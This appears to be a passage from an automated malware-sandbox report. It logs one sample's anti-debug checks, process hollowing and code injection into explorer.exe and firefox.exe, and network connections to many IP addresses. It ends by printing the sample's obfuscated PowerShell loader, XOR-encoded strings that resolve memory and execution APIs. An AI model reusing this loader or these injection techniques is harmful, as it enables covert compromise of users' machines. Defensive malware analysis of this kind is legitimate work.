      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058FF0A5 mov eax, dword ptr fs:[00000030h]22_2_058FF0A5
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058900A5 mov eax, dword ptr fs:[00000030h]22_2_058900A5
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0590B0AF mov eax, dword ptr fs:[00000030h]22_2_0590B0AF
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584B0D6 mov eax, dword ptr fs:[00000030h]22_2_0584B0D6
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584B0D6 mov eax, dword ptr fs:[00000030h]22_2_0584B0D6
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584B0D6 mov eax, dword ptr fs:[00000030h]22_2_0584B0D6
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584B0D6 mov eax, dword ptr fs:[00000030h]22_2_0584B0D6
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0586B0D0 mov eax, dword ptr fs:[00000030h]22_2_0586B0D0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584C0F6 mov eax, dword ptr fs:[00000030h]22_2_0584C0F6
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588D0F0 mov eax, dword ptr fs:[00000030h]22_2_0588D0F0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588D0F0 mov ecx, dword ptr fs:[00000030h]22_2_0588D0F0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058490F8 mov eax, dword ptr fs:[00000030h]22_2_058490F8
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058490F8 mov eax, dword ptr fs:[00000030h]22_2_058490F8
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058490F8 mov eax, dword ptr fs:[00000030h]22_2_058490F8
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058490F8 mov eax, dword ptr fs:[00000030h]22_2_058490F8
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05875004 mov eax, dword ptr fs:[00000030h]22_2_05875004
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05875004 mov ecx, dword ptr fs:[00000030h]22_2_05875004
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05858009 mov eax, dword ptr fs:[00000030h]22_2_05858009
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05892010 mov ecx, dword ptr fs:[00000030h]22_2_05892010
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584D02D mov eax, dword ptr fs:[00000030h]22_2_0584D02D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0592505B mov eax, dword ptr fs:[00000030h]22_2_0592505B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05880044 mov eax, dword ptr fs:[00000030h]22_2_05880044
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05851051 mov eax, dword ptr fs:[00000030h]22_2_05851051
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05851051 mov eax, dword ptr fs:[00000030h]22_2_05851051
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058F9060 mov eax, dword ptr fs:[00000030h]22_2_058F9060
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05856074 mov eax, dword ptr fs:[00000030h]22_2_05856074
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05856074 mov eax, dword ptr fs:[00000030h]22_2_05856074
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05857072 mov eax, dword ptr fs:[00000030h]22_2_05857072
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05851380 mov eax, dword ptr fs:[00000030h]22_2_05851380
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05851380 mov eax, dword ptr fs:[00000030h]22_2_05851380
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05851380 mov eax, dword ptr fs:[00000030h]22_2_05851380
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05851380 mov eax, dword ptr fs:[00000030h]22_2_05851380
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05851380 mov eax, dword ptr fs:[00000030h]22_2_05851380
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0586F380 mov eax, dword ptr fs:[00000030h]22_2_0586F380
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0586F380 mov eax, dword ptr fs:[00000030h]22_2_0586F380
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0586F380 mov eax, dword ptr fs:[00000030h]22_2_0586F380
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0586F380 mov eax, dword ptr fs:[00000030h]22_2_0586F380
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0586F380 mov eax, dword ptr fs:[00000030h]22_2_0586F380
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0586F380 mov eax, dword ptr fs:[00000030h]22_2_0586F380
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587A390 mov eax, dword ptr fs:[00000030h]22_2_0587A390
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587A390 mov eax, dword ptr fs:[00000030h]22_2_0587A390
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587A390 mov eax, dword ptr fs:[00000030h]22_2_0587A390
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0590F38A mov eax, dword ptr fs:[00000030h]22_2_0590F38A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058593A6 mov eax, dword ptr fs:[00000030h]22_2_058593A6
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058593A6 mov eax, dword ptr fs:[00000030h]22_2_058593A6
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058CC3B0 mov eax, dword ptr fs:[00000030h]22_2_058CC3B0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584C3C7 mov eax, dword ptr fs:[00000030h]22_2_0584C3C7
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584E3C0 mov eax, dword ptr fs:[00000030h]22_2_0584E3C0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584E3C0 mov eax, dword ptr fs:[00000030h]22_2_0584E3C0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584E3C0 mov eax, dword ptr fs:[00000030h]22_2_0584E3C0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058563CB mov eax, dword ptr fs:[00000030h]22_2_058563CB
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058833D0 mov eax, dword ptr fs:[00000030h]22_2_058833D0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058D43D5 mov eax, dword ptr fs:[00000030h]22_2_058D43D5
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058843D0 mov ecx, dword ptr fs:[00000030h]22_2_058843D0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058D330C mov eax, dword ptr fs:[00000030h]22_2_058D330C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058D330C mov eax, dword ptr fs:[00000030h]22_2_058D330C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058D330C mov eax, dword ptr fs:[00000030h]22_2_058D330C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058D330C mov eax, dword ptr fs:[00000030h]22_2_058D330C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05849303 mov eax, dword ptr fs:[00000030h]22_2_05849303
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05849303 mov eax, dword ptr fs:[00000030h]22_2_05849303
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058934E0 NtCreateMutant,LdrInitializeThunk,22_2_058934E0

      HIPS / PFW / Operating System Protection Evasion

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeNetwork Connect: 142.44.131.177 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.37 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 194.102.227.30 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 173.255.194.134 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.64 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 192.154.231.174 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 185.215.4.36 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.3 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 208.91.197.91 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 147.92.47.182 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 198.251.81.247 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 103.191.208.50 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 75.102.22.168 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 162.241.225.69 80Jump to behavior
      Sample uses process hollowing technique
      Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exeSection unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 9D0000Jump to behavior
      Maps a DLL or memory area into another process
      Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and writeJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
      Writes to foreign memory regions
      Source: C:\Windows\SysWOW64\chkdsk.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF78C800000Jump to behavior
      Injects a PE file into a foreign processes
      Source: C:\Windows\SysWOW64\chkdsk.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF78C800000 value starts with: 4D5AJump to behavior
      Queues an APC in another process (thread injection)
      Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exeThread register set: target process: 4864Jump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeThread register set: target process: 4864Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$nonreliableness = """infsaupanrecbutpeiraohunsm afshapovisknredrdereraeohuktvsma0ch la{af co ph in frpbaafiruraekmbe(sp[stsfotorrgairenhigam]ud`$giapanantpohkrrstoappcroresvecveoboporyca)id;am ga le st tr`$epkchaudnviuserweisi pr=ho bunalebiwcr-fronubmojskechcfotbi debreyfitcoefo[fo]pa tu(gr`$ouaabnfatashunrdyodupheonosnocinorepvayhy.reluneshndigtotnahpi ov/se de2un)pr;sq ku re af mufkrogertr(af`$svtsirquahycblturisulmoisutovyam=wa0sp;un ra`$botderboaancvittoilaltsichtseybl am-palpltfe al`$chachnnotinholrtyomepseoplssycapobspprybu.stlunepanwugdytsyhre;fl zo`$sttparunaprcuntdiirelpeivitnoyph+pr=an2st)ne{dy br ch`$fobbeaforfobjuaagrhyoviufesth qu=th ca`$xiaafnsgtfahunrjaotepbrodeshechyoejpulyre.anshjumabdislotkururicynangse(ag`$tatverneaudclktovilelbiisttkeyco,ty vr2st)ti;re ba fa ge bl sv bl se ns`$drksaaeunkouhorapida[pr`$metblrmeafecbltobiudlpristtnoyfa/ge2am]tr ti=ru pa[hucdeotanalvblesnrcotpe]sy:kl:vitedopubafyamtprepr(au`$hobpramireybreacirtaoomuimssy,ov st1de6im)st;to be ra`$bokmianantrubortuise[fl`$sktdoramasecintunichlmoiwatplyro/au2pr]re le=go ba(ba`$tokudainnunuvirunica[un`$sotkrrscaakctitseifyljuisutthybr/em2fo]in un-brbmexlkotrrla vu1st5co1sa)va;du lt in be ko}un mi[sustrtsercaiamnfigli]ch[masboylasditsteanmfi.hatsmenextutmo.baefrnescatomadnoiatnengsn]st:ca:tiatoszecfoiskidr.clgsuefitglsfotberstikanimgse(st`$grkklasknanukrrfoicr)ha;gi}he`$tomhuategopnstavelnoeco2me7de0ga=arstopmiifrnacdprehorsaofakersfr0fa fo'hicop4keeuneryeta4hoeal3hafud2dofsyagrbsh9inffj3thflabanfbobof'ca;ga`$semkeaungvinnaaimlteede2kp7al1in=teslopbiidunindsieuirfyogekcosta0tu sh'fidthaunfglearfvi4leedi5trfst8enewa4refir8krfdi1feedi3brbba9incka0hufomedrffu9faaba4saaun5bubde9gicsl2nofma9kuege4wafre6mafno1mafar2kodfu9kofrk6foete3refgaebaeme1thfex2dodkaafrfma2taega3nafesfecfmo8skfpe3prebr4ko'mu;el`$immnoaudgnoncoamalhoeem2om7is2pr=apsdapskihenaadopederkootikfrsda0bu fy'bodsy0infna2faead3decku7oveca5fofsk8ovfpo4cudfi6rofec3lefsp3skens5aufsy2inels4areba4lg'fo;co`$mamfiarogsonhaaholngesy2st7re3ga=fysnypfliblnemdamephrmoosikstskl0di to'myche4yaefrefeede4seehi3softi2tefoiastbsl9incse5uheci2lofpa9drekl3viffjetifcaaclfch2stbte9grdcoeovfho9paeel3nifvi2oletr5rofab8presa7stcpr4odfga2inete5toegi1blfudefnfti4tifkb2caefl4sebot9undanfchfse6pyfyt9defov3syfedbstfbo2skcre5myfno2asfce1mo'da;mo`$remhyastgfuntoarelnoesl2tu7ov4pu=vestrpsaikinvedprekirfioudklesdr0na hi'foeaf4toesu3yaest5safvoeflfla9zefma0kv'su;ye`$drmenamegkanerajolrtece2cl7va5fo=misydphiitenthdstecorseoprkcisrg0pr dr'kvdco0spfeg2yeepd3indurastfun8cafen3pream2nofrebsifpr2chdvifinfgu6mefca9foffu3zyfhybigfes2ek'do;mo`$prmpeakegfrnscarelheeun2mi7re6li=lesfopgiisynbedvieinrxeospkzasga0ni vi'sycji5smche3ascan4foebu7rdfst2nofcy4peffoefofre6bifbibbedro9rafan6nafquatyfdy2mobpabclbso7etdfofdefcheyefma3drfsp2tudsl5kdegaetecun4udfeceomfka0fdbabbfibpu7racsv7haefe2lafhi5faflabvafpoesefpy4so'ra;me`$armapastgfonpraprlstev
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function spinderoks0 { param([string]$anthroposcopy); $kanuri = new-object byte[] ($anthroposcopy.length / 2); for($tractility=0; $tractility -lt $anthroposcopy.length; $tractility+=2){ $barbarous = $anthroposcopy.substring($tractility, 2); $kanuri[$tractility/2] = [convert]::tobyte($barbarous, 16); $kanuri[$tractility/2] = ($kanuri[$tractility/2] -bxor 151); } [string][system.text.encoding]::ascii.getstring($kanuri);}$magnale270=spinderoks0 'c4eee4e3f2fab9f3fbfb';$magnale271=spinderoks0 'dafef4e5f8e4f8f1e3b9c0fef9a4a5b9c2f9e4f6f1f2d9f6e3fee1f2daf2e3fff8f3e4';$magnale272=spinderoks0 'd0f2e3c7e5f8f4d6f3f3e5f2e4e4';$magnale273=spinderoks0 'c4eee4e3f2fab9c5e2f9e3fefaf2b9def9e3f2e5f8e7c4f2e5e1fef4f2e4b9dff6f9f3fbf2c5f2f1';$magnale274=spinderoks0 'e4e3e5fef9f0';$magnale275=spinderoks0 'd0f2e3daf8f3e2fbf2dff6f9f3fbf2';$magnale276=spinderoks0 'c5c3c4e7f2f4fef6fbd9f6faf2bbb7dffef3f2d5eec4fef0bbb7c7e2f5fbfef4';$magnale277=spinderoks0 'c5e2f9e3fefaf2bbb7daf6f9f6f0f2f3';$magnale278=spinderoks0 'c5f2f1fbf2f4e3f2f3d3f2fbf2f0f6e3f2';$magnale279=spinderoks0 'def9daf2faf8e5eedaf8f3e2fbf2';$dunc0=spinderoks0 'daeed3f2fbf2f0f6e3f2c3eee7f2';$dunc1=spinderoks0 'd4fbf6e4e4bbb7c7e2f5fbfef4bbb7c4f2f6fbf2f3bbb7d6f9e4fed4fbf6e4e4bbb7d6e2e3f8d4fbf6e4e4';$dunc2=spinderoks0 'def9e1f8fcf2';$dunc3=spinderoks0 'c7e2f5fbfef4bbb7dffef3f2d5eec4fef0bbb7d9f2e0c4fbf8e3bbb7c1fee5e3e2f6fb';$dunc4=spinderoks0 'c1fee5e3e2f6fbd6fbfbf8f4';$dunc5=spinderoks0 'f9e3f3fbfb';$dunc6=spinderoks0 'd9e3c7e5f8e3f2f4e3c1fee5e3e2f6fbdaf2faf8e5ee';$dunc7=spinderoks0 'ded2cf';$dunc8=spinderoks0 'cb';$udmundingers=spinderoks0 'c2c4d2c5a4a5';$intercessions=spinderoks0 'd4f6fbfbc0fef9f3f8e0c7e5f8f4d6';function fkp {param ($opringningernes, $introsuction) ;$skurvs0 =spinderoks0 'b3d5f8e1f2f9f5e5f6fae4f2fdfbf2f9f2e4b7aab7bfccd6e7e7d3f8faf6fef9caadadd4e2e5e5f2f9e3d3f8faf6fef9b9d0f2e3d6e4e4f2faf5fbfef2e4bfbeb7ebb7c0fff2e5f2bad8f5fdf2f4e3b7ecb7b3c8b9d0fbf8f5f6fbd6e4e4f2faf5fbeed4f6f4fff2b7bad6f9f3b7b3c8b9dbf8f4f6e3fef8f9b9c4e7fbfee3bfb3d3e2f9f4afbeccbaa6cab9d2e6e2f6fbe4bfb3daf6f0f9f6fbf2a5a0a7beb7eabeb9d0f2e3c3eee7f2bfb3daf6f0f9f6fbf2a5a0a6be';&($dunc7) $skurvs0;$skurvs5 = spinderoks0 'b3d2eff4fbe2e4fef8f9fee4fab7aab7b3d5f8e1f2f9f5e5f6fae4f2fdfbf2f9f2e4b9d0f2e3daf2e3fff8f3bfb3daf6f0f9f6fbf2a5a0a5bbb7ccc3eee7f2cccacab7d7bfb3daf6f0f9f6fbf2a5a0a4bbb7b3daf6f0f9f6fbf2a5a0a3bebe';&($dunc7) $skurvs5;$skurvs1 = spinderoks0 'e5f2e3e2e5f9b7b3d2eff4fbe2e4fef8f9fee4fab9def9e1f8fcf2bfb3f9e2fbfbbbb7d7bfccc4eee4e3f2fab9c5e2f9e3fefaf2b9def9e3f2e5f8e7c4f2e5e1fef4f2e4b9dff6f9f3fbf2c5f2f1cabfd9f2e0bad8f5fdf2f4e3b7c4eee4e3f2fab9c5e2f9e3fefaf2b9def9e3f2e5f8e7c4f2e5e1fef4f2e4b9dff6f9f3fbf2c5f2f1bfbfd9f2e0bad8f5fdf2f4e3b7def9e3c7e3e5bebbb7bfb3d5f8e1f2f9f5e5f6fae4f2fdfbf2f9f2e4b9d0f2e3daf2e3fff8f3bfb3daf6f0f9f6fbf2a5a0a2bebeb9def9e1f8fcf2bfb3f9e2fbfbbbb7d7bfb3d8e7e5fef9f0f9fef9f0f2e5f9f2e4bebe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$nonreliableness = """infsaupanrecbutpeiraohunsm afshapovisknredrdereraeohuktvsma0ch la{af co ph in frpbaafiruraekmbe(sp[stsfotorrgairenhigam]ud`$giapanantpohkrrstoappcroresvecveoboporyca)id;am ga le st tr`$epkchaudnviuserweisi pr=ho bunalebiwcr-fronubmojskechcfotbi debreyfitcoefo[fo]pa tu(gr`$ouaabnfatashunrdyodupheonosnocinorepvayhy.reluneshndigtotnahpi ov/se de2un)pr;sq ku re af mufkrogertr(af`$svtsirquahycblturisulmoisutovyam=wa0sp;un ra`$botderboaancvittoilaltsichtseybl am-palpltfe al`$chachnnotinholrtyomepseoplssycapobspprybu.stlunepanwugdytsyhre;fl zo`$sttparunaprcuntdiirelpeivitnoyph+pr=an2st)ne{dy br ch`$fobbeaforfobjuaagrhyoviufesth qu=th ca`$xiaafnsgtfahunrjaotepbrodeshechyoejpulyre.anshjumabdislotkururicynangse(ag`$tatverneaudclktovilelbiisttkeyco,ty vr2st)ti;re ba fa ge bl sv bl se ns`$drksaaeunkouhorapida[pr`$metblrmeafecbltobiudlpristtnoyfa/ge2am]tr ti=ru pa[hucdeotanalvblesnrcotpe]sy:kl:vitedopubafyamtprepr(au`$hobpramireybreacirtaoomuimssy,ov st1de6im)st;to be ra`$bokmianantrubortuise[fl`$sktdoramasecintunichlmoiwatplyro/au2pr]re le=go ba(ba`$tokudainnunuvirunica[un`$sotkrrscaakctitseifyljuisutthybr/em2fo]in un-brbmexlkotrrla vu1st5co1sa)va;du lt in be ko}un mi[sustrtsercaiamnfigli]ch[masboylasditsteanmfi.hatsmenextutmo.baefrnescatomadnoiatnengsn]st:ca:tiatoszecfoiskidr.clgsuefitglsfotberstikanimgse(st`$grkklasknanukrrfoicr)ha;gi}he`$tomhuategopnstavelnoeco2me7de0ga=arstopmiifrnacdprehorsaofakersfr0fa fo'hicop4keeuneryeta4hoeal3hafud2dofsyagrbsh9inffj3thflabanfbobof'ca;ga`$semkeaungvinnaaimlteede2kp7al1in=teslopbiidunindsieuirfyogekcosta0tu sh'fidthaunfglearfvi4leedi5trfst8enewa4refir8krfdi1feedi3brbba9incka0hufomedrffu9faaba4saaun5bubde9gicsl2nofma9kuege4wafre6mafno1mafar2kodfu9kofrk6foete3refgaebaeme1thfex2dodkaafrfma2taega3nafesfecfmo8skfpe3prebr4ko'mu;el`$immnoaudgnoncoamalhoeem2om7is2pr=apsdapskihenaadopederkootikfrsda0bu fy'bodsy0infna2faead3decku7oveca5fofsk8ovfpo4cudfi6rofec3lefsp3skens5aufsy2inels4areba4lg'fo;co`$mamfiarogsonhaaholngesy2st7re3ga=fysnypfliblnemdamephrmoosikstskl0di to'myche4yaefrefeede4seehi3softi2tefoiastbsl9incse5uheci2lofpa9drekl3viffjetifcaaclfch2stbte9grdcoeovfho9paeel3nifvi2oletr5rofab8presa7stcpr4odfga2inete5toegi1blfudefnfti4tifkb2caefl4sebot9undanfchfse6pyfyt9defov3syfedbstfbo2skcre5myfno2asfce1mo'da;mo`$remhyastgfuntoarelnoesl2tu7ov4pu=vestrpsaikinvedprekirfioudklesdr0na hi'foeaf4toesu3yaest5safvoeflfla9zefma0kv'su;ye`$drmenamegkanerajolrtece2cl7va5fo=misydphiitenthdstecorseoprkcisrg0pr dr'kvdco0spfeg2yeepd3indurastfun8cafen3pream2nofrebsifpr2chdvifinfgu6mefca9foffu3zyfhybigfes2ek'do;mo`$prmpeakegfrnscarelheeun2mi7re6li=lesfopgiisynbedvieinrxeospkzasga0ni vi'sycji5smche3ascan4foebu7rdfst2nofcy4peffoefofre6bifbibbedro9rafan6nafquatyfdy2mobpabclbso7etdfofdefcheyefma3drfsp2tudsl5kdegaetecun4udfeceomfka0fdbabbfibpu7racsv7haefe2lafhi5faflabvafpoesefpy4so'ra;me`$armapastgfonpraprlstevJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function spinderoks0 { param([string]$anthroposcopy); $kanuri = new-object byte[] ($anthroposcopy.length / 2); for($tractility=0; $tractility -lt $anthroposcopy.length; $tractility+=2){ $barbarous = $anthroposcopy.substring($tractility, 2); $kanuri[$tractility/2] = [convert]::tobyte($barbarous, 16); $kanuri[$tractility/2] = ($kanuri[$tractility/2] -bxor 151); } [string][system.text.encoding]::ascii.getstring($kanuri);}$magnale270=spinderoks0 'c4eee4e3f2fab9f3fbfb';$magnale271=spinderoks0 'dafef4e5f8e4f8f1e3b9c0fef9a4a5b9c2f9e4f6f1f2d9f6e3fee1f2daf2e3fff8f3e4';$magnale272=spinderoks0 'd0f2e3c7e5f8f4d6f3f3e5f2e4e4';$magnale273=spinderoks0 'c4eee4e3f2fab9c5e2f9e3fefaf2b9def9e3f2e5f8e7c4f2e5e1fef4f2e4b9dff6f9f3fbf2c5f2f1';$magnale274=spinderoks0 'e4e3e5fef9f0';$magnale275=spinderoks0 'd0f2e3daf8f3e2fbf2dff6f9f3fbf2';$magnale276=spinderoks0 'c5c3c4e7f2f4fef6fbd9f6faf2bbb7dffef3f2d5eec4fef0bbb7c7e2f5fbfef4';$magnale277=spinderoks0 'c5e2f9e3fefaf2bbb7daf6f9f6f0f2f3';$magnale278=spinderoks0 'c5f2f1fbf2f4e3f2f3d3f2fbf2f0f6e3f2';$magnale279=spinderoks0 'def9daf2faf8e5eedaf8f3e2fbf2';$dunc0=spinderoks0 'daeed3f2fbf2f0f6e3f2c3eee7f2';$dunc1=spinderoks0 'd4fbf6e4e4bbb7c7e2f5fbfef4bbb7c4f2f6fbf2f3bbb7d6f9e4fed4fbf6e4e4bbb7d6e2e3f8d4fbf6e4e4';$dunc2=spinderoks0 'def9e1f8fcf2';$dunc3=spinderoks0 'c7e2f5fbfef4bbb7dffef3f2d5eec4fef0bbb7d9f2e0c4fbf8e3bbb7c1fee5e3e2f6fb';$dunc4=spinderoks0 'c1fee5e3e2f6fbd6fbfbf8f4';$dunc5=spinderoks0 'f9e3f3fbfb';$dunc6=spinderoks0 'd9e3c7e5f8e3f2f4e3c1fee5e3e2f6fbdaf2faf8e5ee';$dunc7=spinderoks0 'ded2cf';$dunc8=spinderoks0 'cb';$udmundingers=spinderoks0 'c2c4d2c5a4a5';$intercessions=spinderoks0 'd4f6fbfbc0fef9f3f8e0c7e5f8f4d6';function fkp {param ($opringningernes, $introsuction) ;$skurvs0 =spinderoks0 'b3d5f8e1f2f9f5e5f6fae4f2fdfbf2f9f2e4b7aab7bfccd6e7e7d3f8faf6fef9caadadd4e2e5e5f2f9e3d3f8faf6fef9b9d0f2e3d6e4e4f2faf5fbfef2e4bfbeb7ebb7c0fff2e5f2bad8f5fdf2f4e3b7ecb7b3c8b9d0fbf8f5f6fbd6e4e4f2faf5fbeed4f6f4fff2b7bad6f9f3b7b3c8b9dbf8f4f6e3fef8f9b9c4e7fbfee3bfb3d3e2f9f4afbeccbaa6cab9d2e6e2f6fbe4bfb3daf6f0f9f6fbf2a5a0a7beb7eabeb9d0f2e3c3eee7f2bfb3daf6f0f9f6fbf2a5a0a6be';&($dunc7) $skurvs0;$skurvs5 = spinderoks0 'b3d2eff4fbe2e4fef8f9fee4fab7aab7b3d5f8e1f2f9f5e5f6fae4f2fdfbf2f9f2e4b9d0f2e3daf2e3fff8f3bfb3daf6f0f9f6fbf2a5a0a5bbb7ccc3eee7f2cccacab7d7bfb3daf6f0f9f6fbf2a5a0a4bbb7b3daf6f0f9f6fbf2a5a0a3bebe';&($dunc7) $skurvs5;$skurvs1 = spinderoks0 'e5f2e3e2e5f9b7b3d2eff4fbe2e4fef8f9fee4fab9def9e1f8fcf2bfb3f9e2fbfbbbb7d7bfccc4eee4e3f2fab9c5e2f9e3fefaf2b9def9e3f2e5f8e7c4f2e5e1fef4f2e4b9dff6f9f3fbf2c5f2f1cabfd9f2e0bad8f5fdf2f4e3b7c4eee4e3f2fab9c5e2f9e3fefaf2b9def9e3f2e5f8e7c4f2e5e1fef4f2e4b9dff6f9f3fbf2c5f2f1bfbfd9f2e0bad8f5fdf2f4e3b7def9e3c7e3e5bebbb7bfb3d5f8e1f2f9f5e5f6fae4f2fdfbf2f9f2e4b9d0f2e3daf2e3fff8f3bfb3daf6f0f9f6fbf2a5a0a2bebeb9def9e1f8fcf2bfb3f9e2fbfbbbb7d7bfb3d8e7e5fef9f0f9fef9f0f2e5f9f2e4bebeJump to behavior
